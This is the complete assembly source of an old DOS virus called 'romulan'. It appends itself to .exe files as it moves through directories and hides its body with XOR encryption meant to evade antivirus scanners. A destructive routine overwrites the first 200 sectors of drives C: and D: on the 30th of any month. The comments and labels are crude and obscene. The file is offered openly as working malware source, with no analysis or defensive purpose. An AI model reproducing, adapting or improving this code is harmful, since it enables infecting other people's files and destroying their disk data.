;------------------------

;romulan by death dealer

;666 in size
;direct action exe appending virus
;jumps directories
;if seconds are less then 15 then user gets rom basic!
;if day is 30th of any month, hard drives c: to d: die instantly!
;incredible encryption is invisible to all string and heuristics scanners!
;it is safe to infect files on floppy, however make sure it is not the 30th!
;tasm /m
;tlink /t
;------------------------
;look for my new mutation engine soon! no linking required!
;that means any fool can add it to their source!
;simply by running a com file!
;------------------------
;
;

code segment public 'code'

assume cs:code
org 100h

id = 'ky'
maxfiles = 20

start:

virus:
call realthingbaby

realthingbaby:
nop
nop
nop
pop si
sub si,offset realthingbaby

call cloak_uncloak ; uncloak the virus first

cloak_start equ $ ; from here it is cloaked

mov bp,si

push ds
push es
push cs
pop ds
push cs
pop es

lea si,[bp+jmpsave2]
lea di,[bp+jmpsave]
movsw
movsw
movsw
movsw
 lea dx,[bp+offset dta]
call set_dta

mov [bp+counter],byte ptr 0

mov ax,3524h
int 21h
mov word ptr [bp+oldint24],bx
mov word ptr [bp+oldint24+2],es

mov ah,25h
lea dx,[bp+offset int24]
int 21h

push cs
pop es

mov ah,47h
mov dl,0h
lea si,[bp+offset currentdir]
int 21h

jumparound:
lea dx,[bp+offset exefilespec]
call findfirst

lea dx,[bp+offset directory]

mov ah,3bh ; change directory
int 21h
jnc jumparound

call rom_fuck ; call rom and disk fucker

mov ax,2524h
lds dx,[bp+offset oldint24]
int 21h

push cs
pop ds

lea dx,[bp+offset currentdir]

mov ah,3bh
int 21h

mov dx,80h
call set_dta

pop es
pop ds

mov ax,es
add ax,10h
add word ptr cs:[bp+jmpsave+2],ax
add ax,word ptr cs:[bp+stacksave+2]
cli
mov sp,word ptr cs:[bp+stacksave]
mov ss,ax
sti
 db 0eah
jmpsave dd ?
stacksave dd ?
jmpsave2 dd 0fff00000h
stacksave2 dd ?

findfirst:
cmp [bp+counter],maxfiles
ja quit

mov ah,4eh
mov cx,7

findnext:
int 21h
jc quit

call rape

mov ah,4fh
jmp findnext

quit:
ret

rape:
mov ax,3d00h
call opencunt

mov ah,3fh
mov cx,1ah
lea dx,[bp+offset buffer]
int 21h

mov ah,3eh
int 21h

checkexe:
cmp word ptr [bp+buffer+10h],id
jz quitrape
jmp rapeexe

quitrape:
ret

rapeexe:
les ax,dword ptr [bp+buffer+14h]
mov word ptr [bp+jmpsave2],ax
mov word ptr [bp+jmpsave2+2],es

les ax,dword ptr [bp+buffer+0eh]

mov word ptr [bp+stacksave2],es
mov word ptr [bp+stacksave2+2],ax

mov ax, word ptr [bp+buffer+8]

mov cl,4
shl ax,cl
xchg ax,bx
 les ax,[bp+offset dta+26]
mov dx,es
push ax
push dx

sub ax,bx
sbb dx,0
mov cx,10h
div cx

mov word ptr [bp+buffer+14h],dx

mov word ptr [bp+buffer+16h],ax

mov word ptr [bp+buffer+0eh],ax

mov word ptr [bp+buffer+10h],id
pop dx
pop ax

add ax,eof-virus
adc dx,0

mov cl,9
push ax
shr ax,cl
ror dx,cl
stc
adc dx,ax
pop ax
and ah,1

mov word ptr [bp+buffer+4],dx

mov word ptr [bp+buffer+2],ax

push cs
pop es

mov cx,1ah

finishrape:
push cx
xor cx,cx
call attributes

mov al,2
call opencunt

mov ah,40h
lea dx,[bp+buffer]
pop cx
int 21h
jc closecunt

mov al,02
call move_fp

get_time:
mov ah,2ch
int 21h
 cmp dh,0
je get_time
mov [bp+enc_value],dh

call cloak_rape

inc [bp+counter]

closecunt:
mov ax,5701h
mov cx,word ptr [bp+dta+16h]
mov dx,word ptr [bp+dta+18h]
int 21h

mov ah,3eh
int 21h

xor cx,cx
mov cl,byte ptr [bp+dta+15h]
call attributes

retn

rom_fuck: ;the rom routine

int 21

mov ah,2ch
int 21h

cmp dh,15 ;are the seconds less then 15?

ja phase_two ;if not go to nuke_disk

cmp dh,15 ;are the seconds less then 15?

ja phase_two ;if not go to nuke_disk

phase_two:
call nuke_disk

nuke_disk:
mov ah,2ah
int 21h

cmp dl,30 ;is it the 30th of any month?

jne dont_do_shit ;if not then continue virus

mov al,2 ;the c: drive

mov cx,200 ;200 sectors starting at 0
cli ;no aborting :)
cwd
int 026h ;smash the drive!
sti

mov al,3 ;the d: drive

mov cx,200 ;sectors 0-200
cli ;same
cwd
int 026h ;ditto
sti
dont_do_shit:
ret

move_fp:
mov ah,42h
xor cx,cx
xor dx,dx
int 21h
retn

set_dta:
mov ah,1ah
int 21h
retn

opencunt:
mov ah,3dh
lea dx,[bp+dta+30]
int 21h
xchg ax,bx
ret

attributes:
mov ax,4301h
lea dx,[bp+dta+30]
int 21h
ret

int24:
mov al,3
iret

virus_name db 'putersmahz'
virus_man db 'kizz me azz dan snyder (violator)'
thanx_to db 'gretz to menace wc (hope this helpz)'

exefilespec db '*.exe',0
directory db '..',0

cloak_rape:
lea si,[bp+offset move_begin]
lea di,[bp+offset workarea]
mov cx,move_end-move_begin

move_jumparound:
movsb
loop move_jumparound
lea dx,[bp+offset workarea]
call dx
ret

move_begin equ $
mov si,bp
push bx
lea dx,[bp+offset cloak_end]
call dx
 pop bx
mov ah,40h
mov cx,eof-virus
lea dx,[bp+offset virus]
int 21h
push bx
lea dx,[bp+offset cloak_end]
call dx
pop bx
ret
move_end equ $

cloak_end equ $

cloak_uncloak:
lea bx,[si+cloak_start]
mov cx,cloak_end-cloak_start

cloak_jumparound:
mov ah,cs:[bx]
xor ah,[si+enc_value]
mov cs:[bx],ah
inc bx
loop cloak_jumparound
ret

enc_value db 00h

eof equ $

counter db 0
workarea db move_end-move_begin dup (?)
currentdir db 64 dup (?)
dta db 42 dup (?)
buffer db 1ah dup (?)
oldint24 dd ?

eov equ $

code ends
end start